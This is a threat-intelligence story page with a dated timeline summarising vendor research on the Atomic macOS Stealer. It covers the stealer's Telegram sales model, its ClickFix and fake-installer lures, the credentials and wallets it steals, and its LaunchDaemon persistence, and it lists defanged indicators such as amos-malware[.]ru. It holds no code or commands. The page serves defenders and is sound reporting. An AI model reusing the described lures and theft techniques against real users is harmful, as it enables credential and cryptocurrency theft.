Atomic macOS Stealer expands via Telegram MaaS and ClickFix social engineering
Atomic macOS Stealer (AMOS) has emerged as a leading macOS infostealer sold as a malware-as-a-service offering on Telegram and used in campaigns that rely heavily on social engineering rather than exploits. Researchers found the Golang-based malware distributed in forms including malicious DMG installers and ClickFix-style lures that trick users into running Terminal commands, after which it captures or validates the victim’s macOS password, steals Keychain contents, browser credentials, cookies, autofill data, files, Apple Notes, extension storage, session tokens, system information, and cryptocurrency wallet data, then exfiltrates the results to attacker-controlled infrastructure and, in earlier observed versions, Telegram. Operators have advertised AMOS for $1,000 per month alongside add-on services such as a victim panel, crypto tooling, and installer support.
Sophos said AMOS accounted for nearly 40% of its macOS protection updates in 2025 and almost half of recent macOS stealer cases seen by customers, underscoring its scale and persistence. In one investigated intrusion, a bootstrap script fetched from sphereou[.]com downloaded a second-stage payload, performed anti-analysis checks, registered with command-and-control, and established persistence through a LaunchDaemon after obtaining elevated access. Earlier reporting tied AMOS infrastructure to amos-malware[.]ru, with exfiltration observed to /sendlog, while newer variants increasingly use AI-themed lures, fake installers, cracked apps, repeated password prompts, and fake Ledger and Trezor modules to broaden credential theft and cryptocurrency targeting.
Get ahead of threats like this
Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
How this story unfolded
9 events from the most recent confirmed update back to the earliest known activity.
Sophos reports AMOS remains a major macOS threat in 2025
Sophos said AMOS accounted for nearly 40% of its macOS protection updates in 2025 and almost half of recent macOS stealer customer reports. The company highlighted the malware's continued reliance on social engineering themes such as fake installers, cracked apps, AI-themed lures, and repeated password prompts.
Sophos investigates ClickFix-delivered AMOS variant
Sophos MDR investigated a macOS intrusion in which a ClickFix-style social engineering lure tricked a user into running a malicious Terminal command that installed an AMOS variant. The staged infection chain included password capture and validation, second-stage payload retrieval, anti-analysis checks, data theft, exfiltration, C2 registration, and persistence via a LaunchDaemon.
Field Effect detects AMOS delivered via Cursor AI agent session
Field Effect reported an Atomic macOS Stealer infection chain delivered through a Cursor AI agent session, adding a new AI-themed delivery vector for the macOS stealer. The finding expands known AMOS distribution methods beyond cracked apps, ChatGPT-sharing lures, and ClickFix-style social engineering.
LevelBlue links AMOS ecosystem growth to MioLab
LevelBlue SpiderLabs reported that MioLab was building a broader macOS stealer ecosystem centered on Atomic macOS Stealer, adding new attribution and ecosystem context beyond prior reporting on AMOS sales and delivery tactics. The report represents a distinct development in understanding the operators and structure behind the malware.
AMOS campaigns abuse ChatGPT chat-sharing links as a lure
Kaspersky reported that Atomic macOS Stealer was being distributed via campaigns piggybacking on ChatGPT's chat-sharing feature, adding a new social-engineering lure for infecting macOS users. The development showed AMOS operators adapting delivery tactics beyond the fake installers, cracked apps, and ClickFix-style methods already documented.
Trend Micro analyzes AMOS campaign delivered through cracked apps
Trend Micro published an MDR analysis of an Atomic macOS Stealer campaign targeting macOS users through cracked applications. The report adds a distinct campaign and delivery vector to the AMOS timeline, separate from previously documented Telegram sales, ChatGPT-themed lures, and ClickFix-based infections.
AMOS upgraded with new backdoor for persistence
Reporting said Atomic macOS Stealer was updated with a new backdoor component designed to maintain persistence on infected Macs. This represents a technical evolution of the malware beyond previously documented delivery lures and campaigns.
Cyble publishes technical analysis of AMOS stealer
Cyble Research and Intelligence Labs analyzed an AMOS sample distributed as a DMG file that used a fake password prompt to steal the macOS password, Keychain data, browser credentials, files, system information, and cryptocurrency wallet data. The report identified C2 infrastructure at amos-malware[.]ru and noted exfiltration to both the C2 server and Telegram.
Atomic macOS Stealer is advertised for sale on Telegram
Cyble reported that Atomic macOS Stealer (AMOS), a Golang-based macOS information stealer, was being marketed on Telegram as a malware-as-a-service offering for $1,000 per month. The operator advertised supporting services including a victim panel, MetaMask brute-forcing, a crypto checker, and a DMG installer.
Related entities
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
Sources
10 references tracked. Mallory keeps watching after this page renders.
Why AMOS matters: The macOS malware stealing data at scale | SOPHOS
sophos.com
Open sourceWhy AMOS matters: The macOS malware stealing data at scale | SOPHOS
sophos.com
Open sourceField Effect detects AMOS Stealer delivered via Cursor AI agent session
fieldeffect.com
Open source“Say My Name”: How MioLab is building MacOS Stealer Empire
levelblue.com
Open sourceNew AMOS Infection Vector Highlights Risks around AI Adoption
kroll.com
Open sourceAn MDR Analysis of the AMOS Stealer Campaign Targeting macOS via Cracked Apps | Trend Micro (ES)
trendmicro.com
Open sourceAtomic macOS Info-Stealer Upgraded With New Backdoor to Maintain Persistence
cybersecuritynews.com
Open sourceNew Atomic MacOS Stealer For Sale On Telegram
blog.cyble.com
Open sourceSee the full picture, correlated to your attack surface.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.
Related stories
Other stories Mallory is tracking that overlap on entities, sources, or topic labels.
AMOS Mac Malware Spreads via Fake Ads and Trojanized macOS Downloads
Researchers reported multiple campaigns distributing macOS infostealers tied to the **AMOS/AtomicStealer** ecosystem, a malware-as-a-service operation that steals credentials, browser data, cryptocurrency wallets, Apple Notes, files, and **Keychain** material from macOS Catalina and newer systems on Intel, M1, and M2 devices. Earlier reporting on related macOS stealers showed operators relying on social engineering, unsigned DMG files, and password prompts to collect sensitive data, package it into archives, and exfiltrate it to command-and-control servers, with some activity also summarized to Telegram channels. More recent campaigns used **malvertising** and fake software or troubleshooting pages to lure users into running Terminal commands that fetched an AMOS variant known as **"malext"**. Investigators said the malware used obfuscated shell commands, `osascript`, quarantine removal, anti-VM and sandbox checks, and in some cases installed persistence through a LaunchDaemon and helper scripts, while also trojanizing Ledger and Trezor applications and capturing administrator passwords. Reporting also linked AMOS delivery to fake **CleanMyMac** sites and AI-themed lures, indicating operators are rapidly rotating ad accounts and adapting infection vectors to broaden theft and remote access on macOS systems.
May 25, 2026
Atomic macOS Stealer Delivered Through Fake Homebrew Page
A malicious advertisement redirected users to a counterfeit Homebrew page that instructed victims to paste text into Terminal, leading to an **Atomic macOS Stealer (AMOS)** infection on macOS systems. The observed chain dropped files into `/tmp` and installed a persistent payload, with supporting artifacts including password-protected ZIP archives, temporary files, and a malware directory used to maintain access after execution. AMOS is a Golang-based macOS information stealer sold through criminal channels and marketed with ongoing updates and operator support. The malware is designed to harvest **Keychain data**, browser credentials, files, cryptocurrency wallet data, and system information, while also using fake password prompts to capture the macOS password before exfiltrating stolen data to command-and-control infrastructure and Telegram; researchers have previously linked the offering to a subscription model that included a victim management panel and other follow-on criminal services.
Jun 14, 2026
macOS Infostealer Campaigns Using Social Engineering and Evasion Tactics
Threat actors are escalating **macOS infostealer** activity through multiple distribution and evasion techniques aimed at harvesting sensitive user data. One campaign abuses trust in legitimate AI platforms by promoting shareable *ChatGPT* and *Grok* conversation links via **Google Ads**, luring users searching for common macOS troubleshooting help into running malicious Terminal commands using the **“ClickFix”** social-engineering pattern. Executing the provided shell commands results in installation of **Atomic macOS Stealer (AMOS)**, which steals browser credentials, crypto wallet seed phrases, **Keychain** data, and personal files before exfiltrating them to attacker-controlled infrastructure. Separately, **Odyssey Stealer** intrusions against macOS have surged globally, with notable targeting reported in the U.S., France, and Spain and additional impact across Europe, the Americas, and parts of Asia and Africa. Moonlock Lab reporting indicates Odyssey is delivered through **fake software updates, cracked tools, and fraudulent apps**, and is designed to evade detection by generating a **unique fingerprint per infection**, frequently changing code structure, and using many distinct **SHA-256** variants—suggesting automated builders are being used to produce large numbers of hard-to-block samples. Collectively, the reporting highlights sustained pressure on macOS users from credential-stealing malware that blends high-trust lures with rapid variant generation to hinder traditional defenses.
Mar 21, 2026